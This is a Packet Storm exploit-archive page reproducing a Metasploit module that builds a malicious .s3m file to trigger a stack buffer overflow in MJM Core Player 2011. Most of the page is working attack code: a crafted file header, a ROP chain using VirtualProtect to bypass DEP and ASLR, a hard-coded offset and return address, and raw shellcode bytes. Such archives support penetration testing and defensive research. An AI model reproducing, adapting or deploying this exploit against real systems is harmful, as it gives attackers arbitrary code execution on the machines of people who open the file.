what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

MJM Core Player 2011 .s3m Stack Buffer Overflow

MJM Core Player 2011 .s3m Stack Buffer Overflow
Posted Apr 30, 2011
Authored by Rick, corelanc0d3r | Site metasploit.com

This Metasploit module exploits a stack buffer overflow in MJM Core Player 2011 When opening a malicious s3m file in this applications, a stack buffer overflow can be triggered, resulting in arbitrary code execution. This exploit bypasses DEP & ASLR, and works on XP, Vista & Windows 7.

tags | exploit, overflow, arbitrary, code execution
systems | windows
SHA-256 | b34af7c1a1ed7cf2711905e10f913bce6d4781228c221060be316b6715a150a5

MJM Core Player 2011 .s3m Stack Buffer Overflow

Change Mirror Download
##
# $Id: mjm_coreplayer2011_s3m.rb 12473 2011-04-30 02:36:14Z sinn3r $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking

include Msf::Exploit::FILEFORMAT

def initialize(info = {})
super(update_info(info,
'Name' => 'MJM Core Player 2011 .s3m Stack Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in MJM Core Player 2011
When opening a malicious s3m file in this applications, a stack buffer overflow can be
triggered, resulting in arbitrary code execution.
This exploit bypasses DEP & ASLR, and works on XP, Vista & Windows 7.
},
'License' => MSF_LICENSE,
'Author' =>
[
'rick2600', #found the vulnerabilities
'corelanc0d3r', #rop exploit + msf module
],
'Version' => '$Revision: 12473 $',
'References' =>
[
[ 'URL', 'http://www.corelan.be/advisories.php?id=CORELAN-11-004' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 2339, #about 0x900 bytes
'DisableNops' => 'True',
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows Universal Generic DEP & ASLR Bypass',
{
'OffSet' => 819, #core player.exe
'Ret' => 0x1000156f, #core player.exe
}
],
],
'Privileged' => false,
'DisclosureDate' => 'Apr 30, 2011',
'DefaultTarget' => 0))

register_options(
[
OptString.new('FILENAME', [ true, 's3m file', 'song.s3m']),
], self.class)
end

def junk
return rand_text(4).unpack("L")[0].to_i
end

def exploit

print_status("Creating '#{datastore['FILENAME']}' file ...")

header = "\x42\x42\x42\x42\x42\x42\x42\x42\x41\x41\x41\x41\x41\x41\x41\x41"
header << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1a\x10\x00\x00"
header << "\x24\x00\x00\x01\x00\x0d\x08\x00\x20\x13\x02\x00\x53\x43\x52\x4d"
header << "\x40\x06\x94\xb0\x10\xfc\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
header << "\x00\x08\x01\x09\x02\x0a\x03\x0b\x04\x0c\xff\xff\xff\xff\xff\xff"
header << "\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
header << "\x06\x00\x03\x01\x02\x04\x05\x07\x08\x09\x09\x0a\x0b\x0c\x0d\x0e"
header << "\x0f\x10\x10\x11\x12\x13\x14\x15\x16\x16\x17\x18\x19\x18\x1a\x1b"
header << "\x1b\x1c\xff\xff\x13\x00\x18\x00\x1d\x00\x22\x00\x27\x00\x2c\x00"
header << "\x31\x00\x36\x00\x3b\x00\x40\x00\x45\x00\x4a\x00\x4f\x00\x54\x00"
header << "\x59\x00\x5e\x00\x63\x00\x68\x00\x6d\x00\x72\x00\x77\x00\x7c\x00"
header << "\x81\x00\x86\x00\x8b\x00\x90\x00\x95\x00\x9a\x00\x9f\x00\xa4\x00"
header << "\xa9\x00\xae\x00\xb3\x00\xb8\x00\xbd\x00\xc2\x00\xc7\x00\xcc\x00"
header << "\xd1\x00\xd6\x00\xdb\x00\xe0\x00\x14\x01\x4d\x01\x87\x01\xc0\x01"
header << "\x0e\x02\x5a\x02\x9a\x02\xe9\x02\x40\x03\x7f\x03\xc0\x03\x01\x04"
header << "\x28\x04\x52\x04\x86\x04\xb9\x04\xea\x04\x1a\x05\x41\x05\x6e\x05"
header << "\x96\x05\xbc\x05\xeb\x05\x25\x06\x78\x06\xcc\x06\x21\x07\x72\x07"
header << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
header << "\x01"


footer = "\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52"
footer << "\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26"
footer << "\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d"
footer << "\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0"
footer << "\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b"
footer << "\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff"
footer << "\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d"
footer << "\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b"
footer << "\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44"
footer << "\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b"
footer << "\x12\xeb\x86\x5d\x6a\x01\x8d\x85\xb9\x00\x00\x00\x50\x68"
footer << "\x31\x8b\x6f\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x68\xa6\x95"
footer << "\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb"
footer << "\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5\x63\x61\x6c\x63\x00"
footer << "\x00\x00\x00\x00\x00\x00\x00\x00"

print_status("Preparing payload")

pivot = [target.ret].pack('V')


rop_gadgets =
[
# pvefindaddr rop 'n roll
0x004c0021, # POP ECX # RETN
0x00000000,
0x0042850e, # PUSH ESP # ADD EDI,EDI # POP EDI # POP ESI # POP EBX # POP EBP # RETN 0C
junk,
junk,
junk,
0x00461248, # MOV EAX,EDI # POP EDI # POP ESI # RETN
junk,
junk,
junk,
junk,
junk,
0x004ac31d, # POP EBX # RETN
0x00000900,
0x004a8032, # POP ESI # RETN
0x00000080,
0x10009ea7, # ADD EAX,ESI # POP ESI # RETN
junk,
0x004def0d, # XCHG EAX,EBP # RETN
0x004c0145, # POP EAX # RETN
0x005e0ae0, # VirtualProtect
0x00408242, # MOV EAX,DWORD PTR DS:[EAX] # RETN
0x0052001a, # XCHG EAX,ESI # RETN 00
0x004c0729, # POP EDX # RETN
0x00000040,
0x004c0021, # POP ECX # RETN
0x00401000, # RW
0x00448142, # POP EDI # RETN
0x004ae7ce, # RET
0x004c0145, # POP EAX # RETN
0x004ae7ce, # RET
0x0052158e, # PUSHAD # RETN 00
].pack("V*")


buffer = rand_text(target['OffSet'])
buffer << pivot
buffer << rop_gadgets
buffer << make_nops(100)
buffer << payload.encoded

filecontent = header + buffer + footer

print_status("Writing payload to file")

file_create(filecontent)

end

end
Login or Register to add favorites

File Archive:

December 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    0 Files
  • 2
    Dec 2nd
    41 Files
  • 3
    Dec 3rd
    0 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close